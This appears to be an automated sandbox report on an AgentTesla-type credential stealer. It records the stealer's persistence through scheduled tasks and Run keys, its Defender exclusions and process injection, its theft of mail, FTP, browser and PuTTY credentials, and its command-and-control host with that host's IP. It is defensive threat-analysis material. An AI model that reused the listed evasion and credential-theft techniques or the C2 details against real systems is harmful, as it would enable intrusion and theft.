Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
                    Source: Yara matchFile source: 9.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.AWB#150332.exe.41e0e58.5.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.AWB#150332.exe.41a5e38.3.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.AWB#150332.exe.41e0e58.5.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.AWB#150332.exe.41a5e38.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000009.00000002.1329772282.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000015.00000002.2468581975.0000000002EDC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000009.00000002.1333001679.0000000002E51000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.1259265400.0000000004169000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: AWB#150332.exe PID: 5432, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 7200, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 8052, type: MEMORYSTR

Remote Access Functionality

Source: Yara match, file source: 9.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match, file source: 0.2.AWB#150332.exe.41e0e58.5.unpack, type: UNPACKEDPE
Source: Yara match, file source: 0.2.AWB#150332.exe.41a5e38.3.unpack, type: UNPACKEDPE
Source: Yara match, file source: 0.2.AWB#150332.exe.41e0e58.5.raw.unpack, type: UNPACKEDPE
Source: Yara match, file source: 0.2.AWB#150332.exe.41a5e38.3.raw.unpack, type: UNPACKEDPE
Source: Yara match, file source: 00000009.00000002.1333001679.0000000002EA2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, file source: 00000009.00000002.1329772282.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, file source: 00000015.00000002.2468581975.0000000002F4B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, file source: 00000015.00000002.2468581975.0000000002F43000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, file source: 00000015.00000002.2468581975.0000000002EDC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, file source: 00000009.00000002.1333001679.0000000002E51000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, file source: 00000000.00000002.1259265400.0000000004169000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, file source: Process Memory Space: AWB#150332.exe PID: 5432, type: MEMORYSTR
Source: Yara match, file source: Process Memory Space: RegSvcs.exe PID: 7200, type: MEMORYSTR
Source: Yara match, file source: Process Memory Space: RegSvcs.exe PID: 8052, type: MEMORYSTR
MITRE ATT&CK Matrix

Techniques are listed per tactic column in the order the matrix shows them; techniques matched by this analysis carry the badge number shown in the matrix in parentheses, all other entries are the unmatched background of the matrix.

Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies; Network Topology; IP Addresses
Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless; Malvertising; Compromise Infrastructure
Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise; Exploit Public-Facing Application; Supply Chain Compromise
Execution: Windows Management Instrumentation (121); Scheduled Task/Job (1); At; Cron; Launchd; Scheduled Task; Systemd Timers; Container Orchestration Job; Command and Scripting Interpreter; PowerShell
Persistence: DLL Side-Loading (1); Scheduled Task/Job (1); Registry Run Keys / Startup Folder (1); Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job; At; Cron
Privilege Escalation: DLL Side-Loading (1); Process Injection (311); Scheduled Task/Job (1); Registry Run Keys / Startup Folder (1); Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job; At; Cron
Defense Evasion: Disable or Modify Tools (11); Deobfuscate/Decode Files or Information (1); Obfuscated Files or Information (2); Software Packing (12); Timestomp (1); DLL Side-Loading (1); Masquerading (1); Virtualization/Sandbox Evasion (151); Process Injection (311); Hidden Files and Directories (1)
Credential Access: OS Credential Dumping (2); Input Capture (1); Credentials in Registry (1); NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem; /etc/passwd and /etc/shadow; Network Sniffing
Discovery: File and Directory Discovery (1); System Information Discovery (24); Security Software Discovery (221); Process Discovery (1); Virtualization/Sandbox Evasion (151); Application Window Discovery (1); Remote System Discovery; System Owner/User Discovery; Network Sniffing; Network Service Discovery
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services; Direct Cloud VM Connections; Shared Webroot
Collection: Archive Collected Data (11); Data from Local System (2); Email Collection (1); Input Capture (1); Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking; Data Staged; Local Data Staging
Command and Control: Encrypted Channel (1); Non-Standard Port (1); Non-Application Layer Protocol (1); Application Layer Protocol (11); Fallback Channels; Multiband Communication; Commonly Used Port; Application Layer Protocol; Web Protocols; File Transfer Protocols
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol; Exfiltration Over Symmetric Encrypted Non-C2 Protocol; Exfiltration Over Asymmetric Encrypted Non-C2 Protocol
Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement; Internal Defacement; External Defacement
Behavior Graph (ID: 1568202, Sample: AWB#150332.exe, Start date: 04/12/2024, Architecture: WINDOWS, Score: 100)

Start node
  DNS/IP: mail.azmaplast.com
  Signatures: Suricata IDS alerts for network traffic; Found malware configuration; Malicious sample detected (through community Yara rule); 11 other signatures
  Started: AWB#150332.exe; nYNBzxFhCu.exe; boqXv.exe; boqXv.exe

AWB#150332.exe
  Dropped: C:\Users\user\AppData\...\nYNBzxFhCu.exe (PE32); C:\Users\...\nYNBzxFhCu.exe:Zone.Identifier (ASCII); C:\Users\user\AppData\Local\...\tmpFFF1.tmp (XML); C:\Users\user\AppData\...\AWB#150332.exe.log (ASCII)
  Signatures: Uses schtasks.exe or at.exe to add and modify task schedules; Writes to foreign memory regions; Allocates memory in foreign processes; Adds a directory exclusion to Windows Defender
  Started: RegSvcs.exe; powershell.exe; powershell.exe; schtasks.exe

nYNBzxFhCu.exe
  Signatures: Multi AV Scanner detection for dropped file; Machine Learning detection for dropped file; Injects a PE file into a foreign processes
  Started: RegSvcs.exe; schtasks.exe

boqXv.exe (both instances)
  Started: conhost.exe

RegSvcs.exe (started by AWB#150332.exe)
  DNS/IP: mail.azmaplast.com 193.141.65.39, ports 49707, 49710, 587, KPNNL, Iran (ISLAMIC Republic Of)
  Dropped: C:\Users\user\AppData\Roaming\...\boqXv.exe (PE32)
  Signatures: Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines); Hides that the sample has been downloaded from the Internet (zone.identifier)

powershell.exe (first instance)
  Signatures: Loading BitLocker PowerShell Module
  Started: conhost.exe; WmiPrvSE.exe

powershell.exe (second instance)
  Started: conhost.exe

schtasks.exe (started by AWB#150332.exe)
  Started: conhost.exe

RegSvcs.exe (started by nYNBzxFhCu.exe)
  Signatures: Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc); Tries to steal Mail credentials (via file / registry access); Tries to harvest and steal ftp login credentials; Tries to harvest and steal browser information (history, passwords, etc)

schtasks.exe (started by nYNBzxFhCu.exe)
  Started: conhost.exe

Antivirus, Machine Learning and Genetic Malware Detection

Source                                              Detection   Scanner
AWB#150332.exe                                      26%         ReversingLabs
AWB#150332.exe                                      100%        Joe Sandbox ML

Source                                              Detection   Scanner
C:\Users\user\AppData\Roaming\nYNBzxFhCu.exe        100%        Joe Sandbox ML
C:\Users\user\AppData\Roaming\boqXv\boqXv.exe       0%          ReversingLabs
C:\Users\user\AppData\Roaming\nYNBzxFhCu.exe        26%         ReversingLabs

No Antivirus matches
No Antivirus matches

Source                      Detection   Scanner            Label
http://mail.azmaplast.com   0%          Avira URL Cloud    safe

Domains

Name                  IP              Active   Malicious   Antivirus Detection   Reputation
mail.azmaplast.com    193.141.65.39   true     true                              unknown

URLs

Name: http://mail.azmaplast.com
  Source: RegSvcs.exe, 00000009.00000002.1333001679.0000000002EAA000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000015.00000002.2468581975.0000000002F4B000.00000004.00000800.00020000.00000000.sdmp
  Malicious: false
  Antivirus Detection: Avira URL Cloud: safe
  Reputation: unknown
Name: https://account.dyn.com/
  Source: AWB#150332.exe, 00000000.00000002.1259265400.0000000004169000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.1329772282.0000000000402000.00000040.00000400.00020000.00000000.sdmp
  Malicious: false
  Reputation: high
Name: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
  Source: AWB#150332.exe, 00000000.00000002.1258173545.0000000003161000.00000004.00000800.00020000.00000000.sdmp, nYNBzxFhCu.exe, 0000000C.00000002.1333854899.0000000002C01000.00000004.00000800.00020000.00000000.sdmp
  Malicious: false
  Reputation: high
Name: https://www.chiark.greenend.org.uk/~sgtatham/putty/0
  Source: AWB#150332.exe, nYNBzxFhCu.exe.0.dr
  Malicious: false
  Reputation: high

Contacted IPs

IP              Domain               Country                      ASN   ASN Name   Malicious
193.141.65.39   mail.azmaplast.com   Iran (ISLAMIC Republic Of)   286   KPNNL      true
General Information

Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1568202
Start date and time: 2024-12-04 12:52:07 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 7m 0s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes: 30
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: AWB#150332.exe
Detection: MAL
Classification: mal100.troj.spyw.evad.winEXE@23/19@1/1
EGA Information:
• Successful, ratio: 66.7%
HCA Information:
• Successful, ratio: 99%
• Number of executed functions: 105
• Number of non-executed functions: 11
Cookbook Comments:
• Found application associated with file extension: .exe
• Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, sppsvc.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, svchost.exe
• Excluded domains from analysis (whitelisted): fs.microsoft.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, time.windows.com, fe3cr.delivery.mp.microsoft.com
• Execution Graph export aborted for target boqXv.exe, PID 1196 because it is empty
• Execution Graph export aborted for target boqXv.exe, PID 8156 because it is empty
• Not all processes were analyzed; the report is missing behavior information
• Report size exceeded maximum capacity and may have missing behavior information.
• Report size getting too big, too many NtCreateKey calls found.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtProtectVirtualMemory calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• VT rate limit hit for: AWB#150332.exe
Time       Type              Description
06:52:58   API Interceptor   1x Sleep call for process: AWB#150332.exe modified
06:53:01   API Interceptor   39x Sleep call for process: powershell.exe modified
06:53:03   API Interceptor   175x Sleep call for process: RegSvcs.exe modified
06:53:05   API Interceptor   1x Sleep call for process: nYNBzxFhCu.exe modified
12:53:03   Task Scheduler    Run new task: nYNBzxFhCu path: C:\Users\user\AppData\Roaming\nYNBzxFhCu.exe
12:53:03   Autostart         Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run boqXv C:\Users\user\AppData\Roaming\boqXv\boqXv.exe
12:53:11   Autostart         Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run boqXv C:\Users\user\AppData\Roaming\boqXv\boqXv.exe
Context: IP 193.141.65.39

Associated Sample Name / URL          Detection   Threat Name
shipping documents.exe                malicious   AgentTesla
Massive.exe                           malicious   AgentTesla
M.BL CSLEBKK2311030B.exe              malicious   AgentTesla
DHL_CBJ520818836689.exe               malicious   AgentTesla
DHL- CBJ520818836689.pdf.exe          malicious   AgentTesla
DHL- CBJ520818836689.exe              malicious   AgentTesla
Bank Details.exe                      malicious   AgentTesla, DarkTortilla
invoice and packing list.exe          malicious   AgentTesla, PureLog Stealer
PO202408030008.pdf.exe                malicious   AgentTesla
shipping documents.bat.exe            malicious   AgentTesla

Context: domain mail.azmaplast.com

Associated Sample Name / URL          Detection   Threat Name                    Context
shipping documents.exe                malicious   AgentTesla                     193.141.65.39
Massive.exe                           malicious   AgentTesla                     193.141.65.39
M.BL CSLEBKK2311030B.exe              malicious   AgentTesla                     193.141.65.39
DHL_CBJ520818836689.exe               malicious   AgentTesla                     193.141.65.39
DHL- CBJ520818836689.pdf.exe          malicious   AgentTesla                     193.141.65.39
DHL- CBJ520818836689.exe              malicious   AgentTesla                     193.141.65.39
Bank Details.exe                      malicious   AgentTesla, DarkTortilla       193.141.65.39
invoice and packing list.exe          malicious   AgentTesla, PureLog Stealer    193.141.65.39
PO202408030008.pdf.exe                malicious   AgentTesla                     193.141.65.39
shipping documents.bat.exe            malicious   AgentTesla                     193.141.65.39

Context: ASN KPNNL

Associated Sample Name / URL          Detection   Threat Name      Context
loligang.mips.elf                     malicious   Mirai            92.71.76.235
loligang.sh4.elf                      malicious   Mirai            62.132.169.22
nabspc.elf                            malicious   Unknown          145.8.16.90
i686.elf                              malicious   Unknown          92.71.180.75
powerpc.nn.elf                        malicious   Mirai, Okiru     62.132.184.115
nklmpsl.elf                           malicious   Unknown          62.132.108.59
x86.elf                               malicious   Gafgyt, Mirai    212.189.120.82
owari.mpsl.elf                        malicious   Unknown          62.132.39.140
meerkat.mips.elf                      malicious   Mirai            145.8.211.183
sora.ppc.elf                          malicious   Unknown          62.132.39.140

No context

Context: dropped file C:\Users\user\AppData\Roaming\boqXv\boqXv.exe

Associated Sample Name / URL                      Detection   Threat Name
SOA_9828392091.exe                                malicious   AgentTesla
ngPebbPhbp.exe                                    malicious   RHADAMANTHYS
Pi648je050.exe                                    malicious   AgentTesla, PureLog Stealer
shipping documents.exe                            malicious   AgentTesla
Termination_List_November_2024_pdf.exe            malicious   AgentTesla
Payment_Advice_USD_48,054.40_.exe                 malicious   AgentTesla
M1Y6kc9FpE.exe                                    malicious   FormBook
mJIvCBk5vF.exe                                    malicious   FormBook
1aG5DoOsAW.exe                                    malicious   FormBook
copto de pago.exe                                 malicious   AgentTesla
Created / dropped Files

Process: C:\Users\user\Desktop\AWB#150332.exe
File Type: ASCII text, with CRLF line terminators
Category: dropped
Size (bytes): 1216
Entropy (8bit): 5.34331486778365
Encrypted: false
SSDEEP: 24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
MD5: 1330C80CAAC9A0FB172F202485E9B1E8
SHA1: 86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
SHA-256: B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
SHA-512: 75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
Malicious: true
Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

Process: C:\Users\user\AppData\Roaming\boqXv\boqXv.exe
File Type: ASCII text, with CRLF line terminators
Category: modified
Size (bytes): 142
Entropy (8bit): 5.090621108356562
Encrypted: false
SSDEEP: 3:QHXMKa/xwwUC7WglAFXMWA2yTMGfsbNRLFS9Am12MFuAvOAsDeieVyn:Q3La/xwczlAFXMWTyAGCDLIP12MUAvvw
MD5: 8C0458BB9EA02D50565175E38D577E35
SHA1: F0B50702CD6470F3C17D637908F83212FDBDB2F2
SHA-256: C578E86DB701B9AFA3626E804CF434F9D32272FF59FB32FA9A51835E5A148B53
SHA-512: 804A47494D9A462FFA6F39759480700ECBE5A7F3A15EC3A6330176ED9C04695D2684BF6BF85AB86286D52E7B727436D0BB2E8DA96E20D47740B5CE3F856B5D0F
Malicious: false
Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.EnterpriseServices, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..

Process: C:\Users\user\AppData\Roaming\nYNBzxFhCu.exe
File Type: ASCII text, with CRLF line terminators
Category: dropped
Size (bytes): 1216
Entropy (8bit): 5.34331486778365
Encrypted: false
SSDEEP: 24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
MD5: 1330C80CAAC9A0FB172F202485E9B1E8
SHA1: 86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
SHA-256: B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
SHA-512: 75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
Malicious: false
Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

Process: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type: data
Category: dropped
Size (bytes): 2232
Entropy (8bit): 5.3797706053345555
Encrypted: false
                                                                    SSDEEP:48:fWSU4xympx4RfoUP7gZ9tK8NPZHUx7u1iMuge//Z9yus:fLHxv/IwLZ2KRH6OugQs
                                                                    MD5:622AC6AAA9ADE50BADA65159CB384E00
                                                                    SHA1:0D969C19FC47EC07BAFA2584887D5E1FE5D9A09D
                                                                    SHA-256:DB2F76B22A3E51E2326BA008A016A65FFFE3BA5E7A638B355E6AFE8089983186
                                                                    SHA-512:61519FFCD6984EBAED1A45D550449CCF3EE7DEE427AF77149FA3C355ECBF88ED660A83FFFF9C91371091578C6FDE35187149F4150A83B1DEA6153B2FF5BDDC5F
                                                                    Malicious:false
                                                                    Preview:@...e................................................@..........P................1]...E.....j.....(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.Automation<...............i..VdqF...|...........System.Configuration4.................%...K... ...........System.Xml..4.....................@.[8]'.\........System.Data.L.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices8..................1...L..U;V.<}........System.Numerics.H................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com
                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                    File Type:ASCII text, with no line terminators
                                                                    Category:dropped
                                                                    Size (bytes):60
                                                                    Entropy (8bit):4.038920595031593
                                                                    Encrypted:false
                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                    Malicious:false
                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                    File Type:ASCII text, with no line terminators
                                                                    Category:dropped
                                                                    Size (bytes):60
                                                                    Entropy (8bit):4.038920595031593
                                                                    Encrypted:false
                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                    Malicious:false
                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                    File Type:ASCII text, with no line terminators
                                                                    Category:dropped
                                                                    Size (bytes):60
                                                                    Entropy (8bit):4.038920595031593
                                                                    Encrypted:false
                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                    Malicious:false
                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                    File Type:ASCII text, with no line terminators
                                                                    Category:dropped
                                                                    Size (bytes):60
                                                                    Entropy (8bit):4.038920595031593
                                                                    Encrypted:false
                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                    Malicious:false
                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                    File Type:ASCII text, with no line terminators
                                                                    Category:dropped
                                                                    Size (bytes):60
                                                                    Entropy (8bit):4.038920595031593
                                                                    Encrypted:false
                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                    Malicious:false
                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                    File Type:ASCII text, with no line terminators
                                                                    Category:dropped
                                                                    Size (bytes):60
                                                                    Entropy (8bit):4.038920595031593
                                                                    Encrypted:false
                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                    Malicious:false
                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                    File Type:ASCII text, with no line terminators
                                                                    Category:dropped
                                                                    Size (bytes):60
                                                                    Entropy (8bit):4.038920595031593
                                                                    Encrypted:false
                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                    Malicious:false
                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                    File Type:ASCII text, with no line terminators
                                                                    Category:dropped
                                                                    Size (bytes):60
                                                                    Entropy (8bit):4.038920595031593
                                                                    Encrypted:false
                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                    Malicious:false
                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                    Process:C:\Users\user\AppData\Roaming\nYNBzxFhCu.exe
